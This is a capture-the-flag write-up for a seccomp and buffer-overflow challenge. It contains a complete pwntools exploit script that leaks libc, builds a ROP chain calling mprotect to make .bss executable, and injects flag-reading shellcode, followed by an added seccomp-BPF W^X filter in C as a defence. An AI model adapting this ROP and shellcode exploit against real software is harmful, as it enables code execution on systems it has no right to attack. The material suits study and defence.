This is a seccomp + buffer overflow challenge.
After giving the .bss region rwx permissions with mprotect, I used read to write shellcode into .bss (shellcode that opens flag.txt with open, then reads it and writes it out), and then redirected RIP to the .bss region.
Running the code below solves the challenge.
```python
from pwn import *

s = remote("chal.duc.tf", 30006)
elf = ELF("./return-to-whats-revenge")
libc = ELF("./libc.so")
context.arch = 'amd64'

# Stage 1: overflow the 0x30-byte buffer and the saved rbp, then
# call puts(puts@got) and return to main to leak a libc address.
pay = b"A"*0x30
pay += b"B"*8
pay += p64(0x004019db)            # gadget in the binary, followed by its argument
pay += p64(elf.got['puts'])
pay += p64(elf.plt['puts'])
pay += p64(elf.symbols['main'])
s.sendlineafter(b"to?", pay)
s.recvline()
leak = u64(s.recv(6) + b"\x00"*2)
print("leak : " + hex(leak))
libc_base = leak - libc.symbols['puts']
print("libc_base : " + hex(libc_base))

write = libc_base + libc.symbols['write']
read = libc_base + libc.symbols['read']
mprotect = libc_base + libc.symbols['mprotect']
pop_rdi = libc_base + 0x00166a1c
pop_rsi = libc_base + 0x0015de66
pop_rdx = libc_base + 0x00001b9a

# Stage 2: mprotect(0x404000, 0x2000, 7) makes .bss rwx,
# read(0, 0x404050, 0x500) stores the shellcode there,
# and the final return address jumps into it.
pay = b"A"*0x30
pay += b"B"*8
pay += p64(pop_rdi)
pay += p64(0x00404000)
pay += p64(pop_rsi)
pay += p64(0x2000)
pay += p64(pop_rdx)
pay += p64(7)
pay += p64(mprotect)

# open("./flag.txt"), read(fd, rsp, 100), write(1, rsp, 100)
shellcode = ""
shellcode += shellcraft.open("./flag.txt")
shellcode += shellcraft.read("rax", "rsp", 100)
shellcode += shellcraft.write(1, "rsp", 100)
shellcode = asm(shellcode)

pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi)
pay += p64(0x00404050)
pay += p64(pop_rdx)
pay += p64(0x500)
pay += p64(read)
pay += p64(0x00404050)
s.sendlineafter(b"to?", pay)
s.sendline(shellcode)
s.interactive()
```
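As an added defender-side example (not code from the write-up or the challenge): the exploit above only works because the challenge's seccomp filter still permits mprotect, so the .bss region can be made writable and executable before the shellcode is read into it. A W^X rule in the filter closes that step. The C program below installs a minimal seccomp-BPF filter that returns EPERM for any mprotect or mmap call whose prot flags include both PROT_WRITE and PROT_EXEC, while still allowing the usual RW-then-RX transition. The function names (`deny_wx_memory`, `try_make_rwx`, `try_make_rx`) are my own, and it assumes Linux on x86-64 with kernel headers that provide linux/seccomp.h.

```c
/* Added example (defender side), not code from the write-up: a seccomp-BPF
 * filter that rejects mprotect()/mmap() calls asking for memory that is both
 * writable and executable. The exploit above needs mprotect(bss, 0x2000, 7)
 * to succeed; under this filter it returns -1 with errno EPERM, while the
 * usual RW -> RX transition (JIT style) is still allowed.
 * Assumes Linux on x86-64 with kernel headers providing linux/seccomp.h. */
#define _GNU_SOURCE
#include <errno.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef SECCOMP_RET_KILL_PROCESS
#define SECCOMP_RET_KILL_PROCESS SECCOMP_RET_KILL
#endif
#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS 0x20 /* Linux x86-64 value */
#endif

/* Byte offset of the low 32 bits of syscall argument n in struct seccomp_data
 * (little-endian: the prot flags live entirely in the low word). */
#define SC_ARG_LO(n) (offsetof(struct seccomp_data, args) + (n) * sizeof(__u64))

/* Install the W^X filter for the calling thread. Returns 0 on success,
 * -1 with errno set otherwise. Hypothetical helper name. */
int deny_wx_memory(void)
{
    struct sock_filter prog[] = {
        /* 0-2: only accept x86-64 syscall numbers. */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 1, 0),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS),
        /* 3: load the syscall number. */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
        /* 4-8: mprotect(addr, len, prot) with prot containing WRITE and EXEC. */
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_mprotect, 0, 4),
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, SC_ARG_LO(2)),
        BPF_JUMP(BPF_JMP | BPF_JSET | BPF_K, PROT_EXEC, 0, 7),
        BPF_JUMP(BPF_JMP | BPF_JSET | BPF_K, PROT_WRITE, 0, 6),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
        /* 9-13: the same rule for mmap(addr, len, prot, ...). */
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_mmap, 0, 4),
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, SC_ARG_LO(2)),
        BPF_JUMP(BPF_JMP | BPF_JSET | BPF_K, PROT_EXEC, 0, 2),
        BPF_JUMP(BPF_JMP | BPF_JSET | BPF_K, PROT_WRITE, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
        /* 14: everything else passes through. */
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog fprog = {
        .len = sizeof(prog) / sizeof(prog[0]),
        .filter = prog,
    };
    /* Required so an unprivileged process may install a filter. */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &fprog);
}

/* Map one RW page and try to change it to `prot`. Returns 0 if mprotect
 * succeeded, otherwise the errno it produced (-1 if the mmap itself failed). */
static int probe_mprotect(int prot)
{
    long pagesz = sysconf(_SC_PAGESIZE);
    void *p = mmap(NULL, (size_t)pagesz, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return -1;
    int err = mprotect(p, (size_t)pagesz, prot) == 0 ? 0 : errno;
    munmap(p, (size_t)pagesz);
    return err;
}

/* The exploit's step: RW page -> RWX. Expected EPERM once the filter is in. */
int try_make_rwx(void) { return probe_mprotect(PROT_READ | PROT_WRITE | PROT_EXEC); }

/* Legitimate W^X pattern: RW page -> RX. Expected to still succeed (0). */
int try_make_rx(void) { return probe_mprotect(PROT_READ | PROT_EXEC); }

int main(void)
{
    if (deny_wx_memory() != 0) {
        perror("seccomp filter");
        return 1;
    }
    int rwx = try_make_rwx();
    int rx = try_make_rx();
    printf("mprotect(RWX): %s\n", rwx ? strerror(rwx) : "allowed");
    printf("mprotect(RX):  %s\n", rx ? strerror(rx) : "allowed");
    return 0;
}
```

The filter inspects only the low 32 bits of the prot argument, which is enough because the PROT_* flags fit there; a production filter would additionally cover mmap's MAP_FIXED remapping of existing executable regions and pkey_mprotect, and would usually be combined with the challenge's existing syscall allowlist rather than replace it.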